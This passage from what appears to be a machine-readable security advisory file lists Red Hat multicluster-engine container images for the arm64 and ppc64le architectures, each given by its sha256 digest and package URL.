"purl": "pkg:oci/addon-manager-rhel9@sha256%3A4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185824"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3Aa2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Afb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773445006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773531423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091098"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Adabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3A6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091117"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3A2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091011"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3Ae5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773873328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3Abf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773639118"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3Ad07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773100128"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3A70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773869889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3A92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773688774"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Ad0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398895"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3Ae91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398921"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3A06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773877068"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3A2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3Af3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091077"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3Ab34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091070"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3Ac29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773741020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3Afce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3Ae8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970964"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Aa47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Ad00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185824"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3Ac4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773445006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Aec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773531423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3Aca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091098"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Ad35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Af87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091117"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3A4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091011"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
